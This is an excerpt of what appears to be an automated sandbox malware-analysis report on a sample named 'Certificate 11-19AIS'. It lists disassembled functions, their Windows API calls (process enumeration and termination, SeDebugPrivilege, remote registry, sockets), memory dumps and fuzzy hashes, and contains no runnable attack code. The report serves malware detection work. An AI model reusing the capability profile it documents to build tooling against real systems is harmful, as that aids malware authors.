                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: 1c97ef1669a51848f018428f72834d9e70bb34603c373679d4b8cc94fa2605df
                                                                              • Instruction ID: deba578d313515c13c790686c925f26a6e041a9ad3b37e9c04a40f8aa08f0028
                                                                              • Opcode Fuzzy Hash: 1c97ef1669a51848f018428f72834d9e70bb34603c373679d4b8cc94fa2605df
                                                                              • Instruction Fuzzy Hash: 4741C5F1209780DADB394F28AD8DF7A7B96FB95304F19480DF18786A61D778AC80D711
                                                                              Function 007EB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB26C
                                                                              • HeapAlloc.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB273
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007EAEF1,00000B00,?,?), ref: 007EB288
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB290
                                                                              • DuplicateHandle.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB293
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007EAEF1,00000B00,?,?), ref: 007EB2A3
                                                                              • GetCurrentProcess.KERNEL32(007EAEF1,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB2AB
                                                                              • DuplicateHandle.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB2AE
                                                                              • CreateThread.KERNEL32(00000000,00000000,007EB2D4,00000000,00000000,00000000), ref: 007EB2C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: 7708864df5a885be196a9261698c2bc2f19013cceb76c82ac3c3cd56d0a5cebf
                                                                              • Instruction ID: 4ace77394e0b2baf3121259368176276836daa409fabe2807956040f695bed56
                                                                              • Opcode Fuzzy Hash: 7708864df5a885be196a9261698c2bc2f19013cceb76c82ac3c3cd56d0a5cebf
                                                                              • Instruction Fuzzy Hash: E901BFB6640344BFEB10ABA5EC49F5B7BACFB88711F014415FA05DB2A1D6749C00CB61
                                                                              Function 0080C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 0-572801152
                                                                              • Opcode ID: c324c9fd4a4bc6f8c3d04e91b58074a76d8fdbae7223809f41f2e57e3a57927c
                                                                              • Instruction ID: 1fd463e9ef12d5e86ff256b6eb4ab2d70d7dfb13d34b0012294224169d7ef9c9
                                                                              • Opcode Fuzzy Hash: c324c9fd4a4bc6f8c3d04e91b58074a76d8fdbae7223809f41f2e57e3a57927c
                                                                              • Instruction Fuzzy Hash: 86E1BF71A00219ABDF50DFA8DC85AAE77B5FF48314F148229F905EB2C1D774AD41CB94
                                                                              Function 0080BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$_memset
                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 2862541840-625585964
                                                                              • Opcode ID: 15f3e184546369596d15e82698f99c543d58034b27e20cd9e42569da69fd447d
                                                                              • Instruction ID: 461a4e0df9e8bbe7bf34ab52aa2db34a38410f6fadf55c42240bd538c74c6999
                                                                              • Opcode Fuzzy Hash: 15f3e184546369596d15e82698f99c543d58034b27e20cd9e42569da69fd447d
                                                                              • Instruction Fuzzy Hash: 6B918E71A00219ABDF64CFA4DC48FAEB7B8FF85714F10855AF915EB280DB749940CBA0
                                                                              Function 00819A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00819B19
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00819B2D
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00819B47
                                                                              • _wcscat.LIBCMT ref: 00819BA2
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00819BB9
                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00819BE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat
                                                                              • String ID: SysListView32
                                                                              • API String ID: 307300125-78025650
                                                                              • Opcode ID: fa43f23783d0a482920e62db25942f15ab0abe4b49628bb5cefbac3e76495ed0
                                                                              • Instruction ID: ceb19adac1c050151f5ae7634feb911444e96b19cc6a66064bcb61a184f80612
                                                                              • Opcode Fuzzy Hash: fa43f23783d0a482920e62db25942f15ab0abe4b49628bb5cefbac3e76495ed0
                                                                              • Instruction Fuzzy Hash: A3419E70900318ABDB219FA4D889BEA77ACFF08350F10482AF589E7291D6759D848B60
                                                                              Function 0081172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007F6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F6554
                                                                                • Part of subcall function 007F6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 007F6564
                                                                                • Part of subcall function 007F6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007F65F9
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0081179A
                                                                              • GetLastError.KERNEL32 ref: 008117AD
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008117D9
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00811855
                                                                              • GetLastError.KERNEL32(00000000), ref: 00811860
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00811895
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 2533919879-2896544425
                                                                              • Opcode ID: 41b3269de1f9fc08cfdc8cc48d69b6f1c320f3b7b1afae06c40c9dd1fe502434
                                                                              • Instruction ID: 8d8d66ec135e47f0eac7a2986aa8a096a18488d0df2809a97caecc7edf4dcead
                                                                              • Opcode Fuzzy Hash: 41b3269de1f9fc08cfdc8cc48d69b6f1c320f3b7b1afae06c40c9dd1fe502434
                                                                              • Instruction Fuzzy Hash: 4F41AC72600204EFDB15EF54C899FAEB7A5BF44300F048469FA069F3D2DB78A9418B51
                                                                              Function 007F5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 007F58B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2457776203-404129466
                                                                              • Opcode ID: 110618f9320a9a62cb6093f8dfc3fb3991c0277727088262a4e83892f49fbea3
                                                                              • Instruction ID: c0dbcae8c2bb886f5ac9a5a2593548e4196d72ead219507890d6c73c7e14178c
                                                                              • Opcode Fuzzy Hash: 110618f9320a9a62cb6093f8dfc3fb3991c0277727088262a4e83892f49fbea3
                                                                              • Instruction Fuzzy Hash: 0F110D3160974AFAE7015B54DC82DBA27ACEF25364F30003BF751E5381E7ACAA1042A4
                                                                              Function 007FA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 007FA806
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafeVartype
                                                                              • String ID:
                                                                              • API String ID: 1725837607-0
                                                                              • Opcode ID: 8acd6877ce3ae3b442954e3c105e2cd4188431fd6d789d07a6a42ff3805080fd
                                                                              • Instruction ID: cb47832c15ab40aa2e475454072f6c2cdd266de64ad138e526e3a4711a2b6589
                                                                              • Opcode Fuzzy Hash: 8acd6877ce3ae3b442954e3c105e2cd4188431fd6d789d07a6a42ff3805080fd
                                                                              • Instruction Fuzzy Hash: 1BC17CB5A0420AEFDB04DF98D485BBEB7B4FF08311F208469E619E7341D778AA45CB91
                                                                              Function 007F6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007F6B63
                                                                              • LoadStringW.USER32(00000000), ref: 007F6B6A
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007F6B80
                                                                              • LoadStringW.USER32(00000000), ref: 007F6B87
                                                                              • _wprintf.LIBCMT ref: 007F6BAD
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007F6BCB
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 007F6BA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                              • API String ID: 3648134473-3128320259
                                                                              • Opcode ID: bed1469b76402af3d8787a007566c66820e9bd91acd7292ef5911170b1b009bc
                                                                              • Instruction ID: fae6816ac31a0c79ed88ffec702aaf65a626ab010d6caea0008d270ec461f0a3
                                                                              • Opcode Fuzzy Hash: bed1469b76402af3d8787a007566c66820e9bd91acd7292ef5911170b1b009bc
                                                                              • Instruction Fuzzy Hash: C50136F6900318BFEB11A7D4AD89EFB776CE704304F004895B745D2141EA749E848F74
                                                                              Function 00812B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00812BF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharConnectRegistryUpper
                                                                              • String ID:
                                                                              • API String ID: 2595220575-0
                                                                              • Opcode ID: 831ca4f5b40a2ec257528d29ad8b860771e32a3b39013735c990af07ca6f851b
                                                                              • Instruction ID: 433184785fa5f9333471b4f75dfdf3f862057da982271fad1a49be7e75c035b2
                                                                              • Opcode Fuzzy Hash: 831ca4f5b40a2ec257528d29ad8b860771e32a3b39013735c990af07ca6f851b
                                                                              • Instruction Fuzzy Hash: B5916671204204DFCB15EF14D895FAEB7E9FF88310F04881DF9969B2A2DB34A995CB42
                                                                              Function 008095BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • select.WSOCK32 ref: 00809691
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0080969E
                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 008096C8
                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008096E9
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008096F8
                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 008097AA
                                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0084DC00), ref: 00809765
                                                                                • Part of subcall function 007ED2FF: _strlen.LIBCMT ref: 007ED309
                                                                              • _strlen.LIBCMT ref: 00809800
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                              • String ID:
                                                                              • API String ID: 3480843537-0
                                                                              • Opcode ID: b3074bc4efac345476b0f5be2b0c581520d318899b8f2e9ac95b4e64f01ed918
                                                                              • Instruction ID: 494fe5ad4667001ce6c56cf9172f56492fe7d2d788aa8b8e1d8a2892741a0333
                                                                              • Opcode Fuzzy Hash: b3074bc4efac345476b0f5be2b0c581520d318899b8f2e9ac95b4e64f01ed918
                                                                              • Instruction Fuzzy Hash: E4819B71504240ABC714EF64CC89FABB7A8FF89714F104A2DF5959B2A2EB34D904CB92
                                                                              Function 007DA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __mtinitlocknum.LIBCMT ref: 007DA991
                                                                                • Part of subcall function 007D7D7C: __FF_MSGBANNER.LIBCMT ref: 007D7D91
                                                                                • Part of subcall function 007D7D7C: __NMSG_WRITE.LIBCMT ref: 007D7D98
                                                                                • Part of subcall function 007D7D7C: __malloc_crt.LIBCMT ref: 007D7DB8
                                                                              • __lock.LIBCMT ref: 007DA9A4
                                                                              • __lock.LIBCMT ref: 007DA9F0
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00866DE0,00000018,007E5E7B,?,00000000,00000109), ref: 007DAA0C
                                                                              • EnterCriticalSection.KERNEL32(8000000C,00866DE0,00000018,007E5E7B,?,00000000,00000109), ref: 007DAA29
                                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 007DAA39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1422805418-0
                                                                              • Opcode ID: bd2353c1633a8ce890587394d99482302988f8c2c3521fccd10fd9d361b41c40
                                                                              • Instruction ID: dbda6fe23c50aecf26010c8bfda2e5e63b60f4cad5a7e5727a3a78a3980302b4
                                                                              • Opcode Fuzzy Hash: bd2353c1633a8ce890587394d99482302988f8c2c3521fccd10fd9d361b41c40
                                                                              • Instruction Fuzzy Hash: 10410771900206EBEB149F68DA48759BBB0BF41325F10831BE529AB3D1DB7C9D51CB92
                                                                              Function 00818ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00818EE4
                                                                              • GetDC.USER32(00000000), ref: 00818EEC
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00818EF7
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00818F03
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00818F3F
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00818F50
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0081BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00818F8A
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00818FAA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              • Opcode ID: 324cf4629fb0a28e743815ce389522eadacdcc69ffc8076c09d15ffae23988f6
                                                                              • Instruction ID: 151f0b98430663fe8f0c99c7d9146b030bda1091a0d7bbf9a739e13da8e8dffc
                                                                              • Opcode Fuzzy Hash: 324cf4629fb0a28e743815ce389522eadacdcc69ffc8076c09d15ffae23988f6
                                                                              • Instruction Fuzzy Hash: 54317C72200614BFEB108F50DC8AFEA3BADFF89715F044065FE08DA191DAB59842CBB0
                                                                              Function 008016DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                                • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                                              • _wcstok.LIBCMT ref: 0080184E
                                                                              • _wcscpy.LIBCMT ref: 008018DD
                                                                              • _memset.LIBCMT ref: 00801910
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                              • String ID: X
                                                                              • API String ID: 774024439-3081909835
                                                                              • Opcode ID: a206eee01cc31d102495ddc3cbf3f9b5838d0dd9c511f8ced021f615ba329ee3
                                                                              • Instruction ID: 3ab8b1fa169bf9123115691bfb138c1e1e757d51a48c07d50fc7044869f35c31
                                                                              • Opcode Fuzzy Hash: a206eee01cc31d102495ddc3cbf3f9b5838d0dd9c511f8ced021f615ba329ee3
                                                                              • Instruction Fuzzy Hash: D6C15831604344DFC764EF24C989B9AB7E4FF85350F04892DF999972A2DB34E904CB82
                                                                              Function 00820133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0082016D
                                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0082038D
                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008203AB
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 008203D6
                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008203FF
                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00820421
                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00820440
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                              • String ID:
                                                                              • API String ID: 3356174886-0
                                                                              • Opcode ID: 5fb6f01de9a3bdb2754c22fcb940c220ed9e0636de1d98f16838c5379e98f4dd
                                                                              • Instruction ID: b2b2f421a1a325993eb6e6f709cce24de1fe499da8826ae1a5da549c457370f9
